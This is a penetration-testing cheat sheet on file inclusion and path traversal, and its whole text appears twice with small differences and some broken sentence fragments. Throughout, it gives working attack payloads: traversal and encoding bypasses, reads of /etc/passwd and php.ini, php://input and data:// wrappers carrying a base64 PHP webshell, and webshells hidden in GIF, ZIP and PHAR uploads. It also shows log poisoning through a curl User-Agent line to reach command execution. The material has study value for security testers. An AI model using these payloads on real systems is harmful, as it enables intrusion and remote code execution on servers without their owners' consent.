File Inclusion/Path Traversal

Last updated 6 days ago

Was this helpful?

File Inclusion/Path Traversal

Ability to include files and resources within the web page via parameters (not correctly programmed).

Tools

Tool

Details

Test Local File Inclusion Vulnerabilities. python3 liffy.py http://<DOMAIN>/?<PARAM>= <OPTIONS>

Functions

Function

Read Content

Execute

Remote URL

include()/include_once()

✅

require()/require_once()

✅

❌

file_get_contents()

✅

❌

✅

fopen()/file()

✅

❌

Function

Read Content

Execute

Remote URL

fs.readFile()

✅

❌

fs.sendFile()

✅

❌

res.render()

✅

❌

Function

Read Content

Execute

Remote URL

include

✅

❌

import

✅

Function

Read Content

Execute

Remote URL

@Html.Partial()

✅

❌

@Html.RemotePartial()

✅

❌

✅

Response.WriteFile()

✅

❌

include

✅

Local File Inclusion (LFI)

Files to try to read:

Linux: /etc/passwd
Windows: C:\Windows\boot.ini or C:\Windows\win.ini

It is possible to try different payloads of , in particular .

Bypassing Filters

....//....//....//

Regex

%2e%2e%2f%2e%2e%2f

Encoding (../../../../)

%25%32%65%25%32%65%25%32%66

Double Encoding (../../../../)

../../<FILE>%00.png

Null Byte (PHP <5.5)

<PATH>/../../<FILE>

Forced initial path

Read Source PHP

php://filter/read=convert.base64-encode/resource=config.php

In particular try to read the main PHP configuration file: php.iniIn this file you can see if allow_url_include is enabled. Is usually located in:

Apache : /etc/php/X.Y/apache2/php.ini
Nginx: /etc/php/X.Y/fpm/php.ini

Where X.Y is the installed PHP version (try brute force)

RCE PHP

Require allow_url_include.

Allows you to include external data, including php code and execute it. Possibility to pass it the code as base64.

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

Similar to the data wrapper but uses POST requests, useful in case the server only uses POSTs.

php://input + POST with data: '<?php system('<CMD>');?>'

php://input&cmd=id + POST with data: '<?php system($_GET["cmd"]);?>'

Dedicated to execute commands but it is external, it must have been installed manually. (Check the presence of extension=expect in php.ini)

expect://id

Remote File Inclusion (RFI)

The file is loaded from a remote server. In php this is disabled by default, require allow_url_include.

In Windows, however, you can use SMB to enable the remote file without allowing_url_include. This is because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path (//server/share/file). This technique is more likely to work if we were on the same network, since access to remote SMB servers over the Internet may be disabled by default, depending on Windows server configurations.

RCE

If the included file is executed, a webshell can be created according to the language being used by the server and hosted by making it public. Then upload it via the RFI.

Possible to apply SSRF techniques , such as port scanning etc.

File Upload + LFI

If there is the presence of file uploads on the site (even non-vulnerable ones) combined with LFI with a function that executes, then it is possible to exploit the uploaded files to obtain RCE.

Insert a real image (ex. gif) with simply a PHP piece containing the webshell inside. Upload the file, get the path and use it in the LFI.

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

zip://<PATH_TO_ZIP>/<ZIP>#<FILE_IN_ZIP>
zip://<PATH_TO_ZIP>/shell.jpg%23shell.php&cmd=id

Write the following PHP script

shell.php

<?php 
$phar = new Phar('shell.phar'); 
$phar->startBuffering(); 
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>'); 
$phar->setStub('<?php __HALT_COMPILER(); ?>'); 
$phar->stopBuffering();

This script can be compiled into a phar file which, when called, will write a web shell into a subfile shell.txt, which we can interact with.

Compilation and renaming in shell.jpg

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

phar://<PATH_TO_PHAR>/<PHAR>/<SUBFILE>  
phar://<PATH_TO_PHAR>/shell.jpg%2Fshell.txt&cmd=id

Log Poisoning

If the LFI functions have execution, you can try to poison the logs by injecting code (ex. php) and then reading them through the LFI.

Cookies can contain user-specific information in the backend. Examine the log file via the LFI to see what information it contains, and whether it can be poisoned.

Linux: /var/lib/php/sessions/sess_<PHPSESSID>
Windows: C:\Windows\Temp\sess_<PHPSESSID>

Both Apache and Nginx maintain log files (access.log and error.log). access.log contains all requests made to the server, including User-agent, which can be manipulated by us. We use the latter to poison the logs. It is necessary to have read access to the logs. Nginx by default makes logs readable by low-privileged users (like www-data), while Apache logs are only readable by high-privileged users (except for old or badly configured versions). !!! Be aware that getting the payload wrong will block access to the logs.

access.log and error.log are located in:

Apache:
- Linux: /var/log/apache2/
- Windows: C:\xampp\apache\logs
Nginx:
- Linux: /var/log/nginx/
- Windows: C:\nginx\log\

curl <URL> -A "<?php system(\$_GET['cmd']); ?>"

The User-Agent also appears on process files in the Linux /proc/ directory. So, we can try to include the files /proc/self/environment/proc/self/fd/N (where N is a PID usually between 0 and 50) and we might be able to perform the same attack on these files. This might be useful if we don't have read access to the server logs, however, these files might only be readable by privileged users.

There are other similar log poisoning techniques that we could use on various system logs, depending on which logs we have read access to.

Some of the logs we could read:

/var/log/sshd.log
/var/log/mail
/var/log/vsftpd.log

Last updated 6 days ago

Was this helpful?

Ability to include files and resources within the web page via parameters (not correctly programmed).

Tools

Tool

Details

Test Local File Inclusion Vulnerabilities. python3 liffy.py http://<DOMAIN>/?<PARAM>= <OPTIONS>

Functions

Function

Read Content

Execute

Remote URL

include()/include_once()

✅

require()/require_once()

✅

❌

file_get_contents()

✅

❌

✅

fopen()/file()

✅

❌

Function

Read Content

Execute

Remote URL

fs.readFile()

✅

❌

fs.sendFile()

✅

❌

res.render()

✅

❌

Function

Read Content

Execute

Remote URL

include

✅

❌

import

✅

Function

Read Content

Execute

Remote URL

@Html.Partial()

✅

❌

@Html.RemotePartial()

✅

❌

✅

Response.WriteFile()

✅

❌

include

✅

Local File Inclusion (LFI)

Files to try to read:

Linux: /etc/passwd
Windows: C:\Windows\boot.ini or C:\Windows\win.ini

It is possible to try different payloads of , in particular .

Bypassing Filters

....//....//....//

Regex

%2e%2e%2f%2e%2e%2f

Encoding (../../../../)

%25%32%65%25%32%65%25%32%66

Double Encoding (../../../../)

../../<FILE>%00.png

Null Byte (PHP <5.5)

<PATH>/../../<FILE>

Forced initial path

Read Source PHP

If you include code that is interpreted and executed, but instead want to read the source, you can use and .

php://filter/read=convert.base64-encode/resource=config.php

In particular try to read the main PHP configuration file: php.iniIn this file you can see if allow_url_include is enabled. Is usually located in:

Apache : /etc/php/X.Y/apache2/php.ini
Nginx: /etc/php/X.Y/fpm/php.ini

Where X.Y is the installed PHP version (try brute force)

RCE PHP

Require allow_url_include.

Allows you to include external data, including php code and execute it. Possibility to pass it the code as base64.

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

Similar to the data wrapper but uses POST requests, useful in case the server only uses POSTs.

php://input + POST with data: '<?php system('<CMD>');?>'

php://input&cmd=id + POST with data: '<?php system($_GET["cmd"]);?>'

Dedicated to execute commands but it is external, it must have been installed manually. (Check the presence of extension=expect in php.ini)

expect://id

Remote File Inclusion (RFI)

The file is loaded from a remote server. In php this is disabled by default, require allow_url_include.

RCE

If the included file is executed, a webshell can be created according to the language being used by the server and hosted by making it public. Then upload it via the RFI.

Possible to apply SSRF techniques , such as port scanning etc.

File Upload + LFI

If there is the presence of file uploads on the site (even non-vulnerable ones) combined with LFI with a function that executes, then it is possible to exploit the uploaded files to obtain RCE.

Insert a real image (ex. gif) with simply a PHP piece containing the webshell inside. Upload the file, get the path and use it in the LFI.

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

In this case we should upload a zip. Create a webshell to wrap a zip file and upload the zip, then access it via the in LFI. However, this wrapper is not enabled by default, and may not always work.

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

zip://<PATH_TO_ZIP>/<ZIP>#<FILE_IN_ZIP>
zip://<PATH_TO_ZIP>/shell.jpg%23shell.php&cmd=id

Similar result to the case with the ZIP, but via the wrapper.

Write the following PHP script

shell.php

<?php 
$phar = new Phar('shell.phar'); 
$phar->startBuffering(); 
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>'); 
$phar->setStub('<?php __HALT_COMPILER(); ?>'); 
$phar->stopBuffering();

This script can be compiled into a phar file which, when called, will write a web shell into a subfile shell.txt, which we can interact with.

Compilation and renaming in shell.jpg

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

phar://<PATH_TO_PHAR>/<PHAR>/<SUBFILE>  
phar://<PATH_TO_PHAR>/shell.jpg%2Fshell.txt&cmd=id

Log Poisoning

If the LFI functions have execution, you can try to poison the logs by injecting code (ex. php) and then reading them through the LFI.

Cookies can contain user-specific information in the backend. Examine the log file via the LFI to see what information it contains, and whether it can be poisoned.

Linux: /var/lib/php/sessions/sess_<PHPSESSID>
Windows: C:\Windows\Temp\sess_<PHPSESSID>

access.log and error.log are located in:

Apache:
- Linux: /var/log/apache2/
- Windows: C:\xampp\apache\logs
Nginx:
- Linux: /var/log/nginx/
- Windows: C:\nginx\log\
They can change, see:

curl <URL> -A "<?php system(\$_GET['cmd']); ?>"

There are other similar log poisoning techniques that we could use on various system logs, depending on which logs we have read access to.

Some of the logs we could read:

/var/log/sshd.log
/var/log/mail
/var/log/vsftpd.log